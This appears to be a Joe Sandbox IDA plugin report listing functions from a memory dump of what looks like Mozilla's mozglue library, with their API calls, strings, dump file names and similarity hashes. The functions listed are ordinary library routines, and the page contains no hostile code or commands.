Function 6B0DC1F0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6B0DC1DE,?,00000000,?,00000000,?,6B08779F), ref: 6B0DC1F8
GetProcAddress.KERNEL32(00000000,WinVerifyTrust), ref: 6B0DC217
FreeLibrary.KERNEL32(?,6B0DC1DE,?,00000000,?,00000000,?,6B08779F), ref: 6B0DC22C

Strings

wintrust.dll, xrefs: 6B0DC1F3
WinVerifyTrust, xrefs: 6B0DC211

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: WinVerifyTrust$wintrust.dll
API String ID: 145871493-2991032369
Opcode ID: 4bdfb345316d6504133c964c020dc687331f3a5e84e954f5dbf99e585a24eb73
Instruction ID: 95a828dc7704b5ca66d7bf615497850322455e31c2dfb0e36a5c0e5c7587efad
Opcode Fuzzy Hash: 4bdfb345316d6504133c964c020dc687331f3a5e84e954f5dbf99e585a24eb73
Instruction Fuzzy Hash: 8DE0B6746423819BEF046F65E90871A7FEDAB16304F000129ED05C2781E7B9C002CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6B0860E0 Relevance: 7.6, APIs: 6, Instructions: 141COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,00000000,?,6B085FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6B0860F4
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,6B085FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6B086180
free.MOZGLUE(?,?,?,?,6B085FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6B086211
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,00000000,?,6B085FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6B086229
free.MOZGLUE(?,?,?,?,6B085FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6B08625E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6B085FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6B086271

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: c0017464df1d4614e7756798cd3fa20f0cc005e50e0660fa3e757906222597c9
Instruction ID: 37c25cd1c7127839cba2c0f3cba142b3c16874312f38a9c73dbea260e80d2b92
Opcode Fuzzy Hash: c0017464df1d4614e7756798cd3fa20f0cc005e50e0660fa3e757906222597c9
Instruction Fuzzy Hash: 2C519CB1A102068FEF18CFA8D89176EBBF5EF49304F160479CA169B311E739EA15CB51

Uniqueness

Uniqueness Score: -1.00%

Function 6B0BD210 Relevance: 7.6, APIs: 5, Instructions: 115stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,6B085820,?), ref: 6B0BD21F
moz_xmalloc.MOZGLUE(00000001,?,?,6B085820,?), ref: 6B0BD22E

Part of subcall function 6B08CA10: malloc.MOZGLUE(?), ref: 6B08CA26

memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,6B085820,?), ref: 6B0BD242
free.MOZGLUE(00000000,?,?,?,?,?,?,6B085820,?), ref: 6B0BD253

Part of subcall function 6B095E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6B095EDB
Part of subcall function 6B095E90: memset.VCRUNTIME140(ewk,000000E5,?), ref: 6B095F27
Part of subcall function 6B095E90: LeaveCriticalSection.KERNEL32(?), ref: 6B095FB2

memcpy.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,?,6B085820,?), ref: 6B0BD280

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: CriticalSectionmemset$EnterLeavefreemallocmemcpymoz_xmallocstrlen
String ID:
API String ID: 2029485308-0
Opcode ID: 623bcddc6512946363d3210f71d32a53145dd6d9b9299e0af9412b4836f92438
Instruction ID: f2fe94d93375cce84aeae699a362e7d75e36c124f451e54d3aa358e464de45c6
Opcode Fuzzy Hash: 623bcddc6512946363d3210f71d32a53145dd6d9b9299e0af9412b4836f92438
Instruction Fuzzy Hash: 3131A2B5940255ABCB08CF68C881B6EFFB6BF99704F2441A9D9546B301D37BE902C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 6B08C150 Relevance: 7.6, APIs: 5, Instructions: 110stringtimeCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6B08C1BC
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6B08C1DC

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: Now@Stamp@mozilla@@TimeV12@_strlen
String ID:
API String ID: 1885715127-0
Opcode ID: ca14059a3f1455da410988ddda7d45a35dc724d0a927e1a5a5cf9992c21ba9df
Instruction ID: f40a1896c9b75d30eb94d65032014c357ac8edc6917c22d9376b3441f18ab69e
Opcode Fuzzy Hash: ca14059a3f1455da410988ddda7d45a35dc724d0a927e1a5a5cf9992c21ba9df
Instruction Fuzzy Hash: 8D41B3B1D083408FDB24CF68D48175ABFF4BF9A704F408A6DE8899B252E734D944CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6B0DA820 Relevance: 7.6, APIs: 5, Instructions: 106stringCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6B0FF770), ref: 6B0DA858
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6B0DA87B

Part of subcall function 6B0DA9D0: memcpy.VCRUNTIME140(?,?,00000400,?,?,?,6B0DA88F,00000000), ref: 6B0DA9F1

_ltoa_s.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,00000020,0000000A), ref: 6B0DA8FF
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6B0DA90C
LeaveCriticalSection.KERNEL32(6B0FF770), ref: 6B0DA97E

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: CriticalSectionstrlen$EnterLeave_ltoa_smemcpy
String ID:
API String ID: 1355178011-0
Opcode ID: 0b53e04d99ffdc6793419aa8a153aa6ccf3eca9cd2138a17553476bf77d56feb
Instruction ID: c6c91205cd411c6b4d0cd95424d4b7555ea9e2b5ade5abf625e08f5344311193
Opcode Fuzzy Hash: 0b53e04d99ffdc6793419aa8a153aa6ccf3eca9cd2138a17553476bf77d56feb
Instruction Fuzzy Hash: BE4160B0A003449FDB08DFA8D845B9DBF75FF08324F148619E926AB3C1D7799942CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6B074310 Relevance: 7.6, APIs: 5, Instructions: 96COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000010,?,6B0742D2), ref: 6B07436A

Part of subcall function 6B08CA10: malloc.MOZGLUE(?), ref: 6B08CA26

memcpy.VCRUNTIME140(00000023,?,?,?,?,6B0742D2), ref: 6B074387
moz_xmalloc.MOZGLUE(80000023,?,6B0742D2), ref: 6B0743B7
free.MOZGLUE(00000000,?,6B0742D2), ref: 6B0743EF
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,6B0742D2), ref: 6B074406

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: moz_xmalloc$_invalid_parameter_noinfo_noreturnfreemallocmemcpy
String ID:
API String ID: 2563754823-0
Opcode ID: de336ce16b75ae8960237915f4d169e4a3edc6e53f906ce02ca05cc8ed868425
Instruction ID: 84682bab369ecb4c168cac5526678ba2a68ee09e5a981f0713b42db5b5f1ae8a
Opcode Fuzzy Hash: de336ce16b75ae8960237915f4d169e4a3edc6e53f906ce02ca05cc8ed868425
Instruction Fuzzy Hash: 5D31EA71A001156FD72CEE799C9076EFFE6FB44224B140B79E919DB384E734E9008795

Uniqueness

Uniqueness Score: -1.00%

Function 6B0D0B90 Relevance: 7.6, APIs: 5, Instructions: 92timeCOMMON

Download Yara Rule

APIs

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6B0D0BBC

Part of subcall function 6B095C50: GetTickCount64.KERNEL32 ref: 6B095D40
Part of subcall function 6B095C50: EnterCriticalSection.KERNEL32(6B0FF688), ref: 6B095D67

?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6B0D0BCA
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6B0D0BD5

Part of subcall function 6B095C50: __aulldiv.LIBCMT ref: 6B095DB4
Part of subcall function 6B095C50: LeaveCriticalSection.KERNEL32(6B0FF688), ref: 6B095DED

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6B0D0BE2
?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6B0D0C9A

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: Time$StampV01@@Value@mozilla@@$CriticalSection$BaseCount64Creation@DurationEnterLeavePlatformProcessSeconds@Stamp@mozilla@@TickUtils@mozilla@@V12@__aulldiv
String ID:
API String ID: 3168180809-0
Opcode ID: 023d4c7bcdc1058d51feb8af8762a9f6fe56edb8ad8290368facf1433a6902a5
Instruction ID: 586adbd1906a567b176233e3ace502f334ffd1c0897e262c6696861314ecf520
Opcode Fuzzy Hash: 023d4c7bcdc1058d51feb8af8762a9f6fe56edb8ad8290368facf1433a6902a5
Instruction Fuzzy Hash: 4131E6719187148BC718DF39949021BBBE8FF827A0F505B1EF869A72D0EB74D8458B92

Uniqueness

Uniqueness Score: -1.00%

Function 6B0739A0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 86COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6B0FE744,ewk,00000000,ewk,?,6B096112), ref: 6B0739AF
LeaveCriticalSection.KERNEL32(6B0FE744,?,6B096112), ref: 6B073A34
EnterCriticalSection.KERNEL32(6B0FE784,6B096112), ref: 6B073A4B
LeaveCriticalSection.KERNEL32(6B0FE784), ref: 6B073A5F

Strings

ewk, xrefs: 6B0739A3, 6B0739A5

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: ewk
API String ID: 3168844106-332161125
Opcode ID: ed876797ca8d00dbb296eedd6ae36c21b7389d37f39e68e1c517fd89d3f1f070
Instruction ID: 6d857f269ead2d4e0241d7fbe0222d5cf0f4b0181cbee9bdf32f79cd3174b3ae
Opcode Fuzzy Hash: ed876797ca8d00dbb296eedd6ae36c21b7389d37f39e68e1c517fd89d3f1f070
Instruction Fuzzy Hash: 722126327017018FDB3CDA65D842B19BFE9EB897107194579DD6583680DB38E8038B46

Uniqueness

Uniqueness Score: -1.00%

Function 6B086390 Relevance: 7.6, APIs: 5, Instructions: 72threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6B0863D0
AcquireSRWLockExclusive.KERNEL32 ref: 6B0863DF
ReleaseSRWLockExclusive.KERNEL32 ref: 6B08640E
__Init_thread_footer.LIBCMT ref: 6B086467
??$AddMarkerToBuffer@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@AAVProfileChunkedBuffer@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6B0864A8

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: Marker$D@std@@ExclusiveLockProfileTextU?$char_traits@V?$allocator@V?$basic_string@$AcquireBlockBufferBuffer@Buffer@1@Category@1@$$ChunkedCurrentD@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@Index@1@Init_thread_footerMarker@markers@01@Marker@markers@baseprofiler@mozilla@@Options@1@ProfilerReleaseStringThreadView@
String ID:
API String ID: 3202982786-0
Opcode ID: d80d60f58ab9407c47d5a1444c155d153792d070af2fd9e4c822dc09d167de81
Instruction ID: a48a661cc2174286b1c2f29a238298390676cdf54a435d796c86031f9e9cbe84
Opcode Fuzzy Hash: d80d60f58ab9407c47d5a1444c155d153792d070af2fd9e4c822dc09d167de81
Instruction Fuzzy Hash: 503147B1A152448FDB08DF68E08575ABFE9FB86218F12482EDC9987341D738E485CB63

Uniqueness

Uniqueness Score: -1.00%

Function 6B0D9B50 Relevance: 7.6, APIs: 5, Instructions: 53COMMON

Download Yara Rule

APIs

??KDecimal@blink@@QBE?AV01@ABV01@@Z.MOZGLUE(?,?), ref: 6B0D9B74
?ceil@Decimal@blink@@QBE?AV12@XZ.MOZGLUE ref: 6B0D9BBA
?floor@Decimal@blink@@QBE?AV12@XZ.MOZGLUE ref: 6B0D9BC8
??DDecimal@blink@@QBE?AV01@ABV01@@Z.MOZGLUE(?,?), ref: 6B0D9BD7
??GDecimal@blink@@QBE?AV01@ABV01@@Z.MOZGLUE(?,?,?,?), ref: 6B0D9BE0

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: Decimal@blink@@$V01@V01@@$V12@$?ceil@?floor@
String ID:
API String ID: 2380687156-0
Opcode ID: 7d6cee923e3343f4fc7a32cff94a1275feeed3a18f3abe52b2912a4b7bd77b99
Instruction ID: d0802f6a82afcd6f743d5da3223f487a4d3c31be248affe2cb9206197c528441
Opcode Fuzzy Hash: 7d6cee923e3343f4fc7a32cff94a1275feeed3a18f3abe52b2912a4b7bd77b99
Instruction Fuzzy Hash: 5E118232914348A7C704AF788D519AFBBB8FFC6364F405A0DF99947182EB35D544C792

Uniqueness

Uniqueness Score: -1.00%

Function 6B0D5850 Relevance: 7.5, APIs: 5, Instructions: 41synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(000000FF), ref: 6B0D586C
CloseHandle.KERNEL32 ref: 6B0D5878
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6B0D5898
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6B0D58C9
free.MOZGLUE(00000000), ref: 6B0D58D3

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: free$CloseHandleObjectSingleWait
String ID:
API String ID: 1910681409-0
Opcode ID: e5e03cd4cd2236469a58e3540240a9e2b31cfa978b571aabfe8b67363effb391
Instruction ID: a7173ef039345d2c0b1e80af6dcb3449df2d86e6542b7e43d3582120c3f59ff0
Opcode Fuzzy Hash: e5e03cd4cd2236469a58e3540240a9e2b31cfa978b571aabfe8b67363effb391
Instruction Fuzzy Hash: ED01FBB5B062019BDB049F2AF808B067FBDEB83B257644176EF1AD2290D735D919CF81

Uniqueness

Uniqueness Score: -1.00%

Function 6B0D1700 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 190COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 6B0D1800

Part of subcall function 6B0ACBE8: GetCurrentProcess.KERNEL32(?,6B0731A7), ref: 6B0ACBF1
Part of subcall function 6B0ACBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6B0731A7), ref: 6B0ACBFA

Part of subcall function 6B074290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6B0B3EBD,6B0B3EBD,00000000), ref: 6B0742A9

Strings

{marker.name} - {marker.data.name}, xrefs: 6B0D18C7
name, xrefs: 6B0D1939
Details, xrefs: 6B0D1925

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: Process$CurrentInit_thread_footerTerminatestrlen
String ID: Details$name${marker.name} - {marker.data.name}
API String ID: 46770647-1733325692
Opcode ID: 8169b5ed06e7926f2a08ae6c242d49172432d79ddb3b71a89cff72627dece679
Instruction ID: b6639c7cefa05a06ff7b1346e07030c811d6d82e2b10898843dd8d0b17abb4af
Opcode Fuzzy Hash: 8169b5ed06e7926f2a08ae6c242d49172432d79ddb3b71a89cff72627dece679
Instruction Fuzzy Hash: 7671F370A003469FD708DF38E49175ABFB5FF45300F404669D8195B781DB78AA95CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 6B0DB0C0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 188COMMON

Download Yara Rule

APIs

free.MOZGLUE(?,?,6B0DB0A6,6B0DB0A6,?,6B0DAF67,?,00000010,?,6B0DAF67,?,00000010,00000000,?,?,6B0DAB1F), ref: 6B0DB1F2
?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,6B0DB0A6,6B0DB0A6,?,6B0DAF67,?,00000010,?,6B0DAF67,?,00000010,00000000,?), ref: 6B0DB1FF
free.MOZGLUE(?,?,?,map/set<T> too long,?,?,6B0DB0A6,6B0DB0A6,?,6B0DAF67,?,00000010,?,6B0DAF67,?,00000010), ref: 6B0DB25F

Strings

map/set<T> too long, xrefs: 6B0DB1FA

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: free$Xlength_error@std@@
String ID: map/set<T> too long
API String ID: 1922495194-1285458680
Opcode ID: 20e2ddd469ee1906f4d10eb2436fbd64b18f08c5cbb73f5b19d3ac340cb67b82
Instruction ID: 344cb7a4897c8476cf4f201b6d497f6b911f8ecd26e2ed5e3bcb51320578da94
Opcode Fuzzy Hash: 20e2ddd469ee1906f4d10eb2436fbd64b18f08c5cbb73f5b19d3ac340cb67b82
Instruction Fuzzy Hash: BF615879A003459FD709CF19C884B9ABFE2BF4A314F98C599D8594B3A2C739EC41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6B0E9830 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

??0PrintfTarget@mozilla@@IAE@XZ.MOZGLUE ref: 6B0E985D
?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6B0E987D
MOZ_CrashPrintf.MOZGLUE(ElementAt(aIndex = %zu, aLength = %zu),?,?), ref: 6B0E98DE

Strings

ElementAt(aIndex = %zu, aLength = %zu), xrefs: 6B0E98D9

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: Printf$Target@mozilla@@$?vprint@Crash
String ID: ElementAt(aIndex = %zu, aLength = %zu)
API String ID: 1778083764-3290996778
Opcode ID: 5228beeda66151997ee4a5a21bf70eaf824d52835bca63bad8672408d3c3bb91
Instruction ID: e7271f54f02157a4dafd69f966d7b805a2f210bb2f6592c121a31eff0961381c
Opcode Fuzzy Hash: 5228beeda66151997ee4a5a21bf70eaf824d52835bca63bad8672408d3c3bb91
Instruction Fuzzy Hash: 82310871B001086FDB189FA9DC45BAE7FA9DF84754F50442DEE0A9B381DB399901CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6B07F100 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 49libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(shell32,?,6B0ED020), ref: 6B07F122
GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6B07F132

Strings

SHGetKnownFolderPath, xrefs: 6B07F12C
shell32, xrefs: 6B07F11D

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: SHGetKnownFolderPath$shell32
API String ID: 2574300362-1045111711
Opcode ID: 0c04f61d301a127900fe1ede7d1631b8c85c7b6efd57623f4b474c07a1b23593
Instruction ID: 86e92fd5b245ccf40414e76024c2383ddaaf7e33056452d4b3f6dda0a1e1a932
Opcode Fuzzy Hash: 0c04f61d301a127900fe1ede7d1631b8c85c7b6efd57623f4b474c07a1b23593
Instruction Fuzzy Hash: 19011E71715219ABDB14AF69EC58B5BBFECFF4A754B404428ED49D7200DB34E904CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6B0ACBE8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,6B0731A7), ref: 6B0ACBF1
TerminateProcess.KERNEL32(00000000,00000003,?,6B0731A7), ref: 6B0ACBFA

Strings

: (malloc) Error in VirtualFree(), xrefs: 6B0AD001
<jemalloc>, xrefs: 6B0ACFFC

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

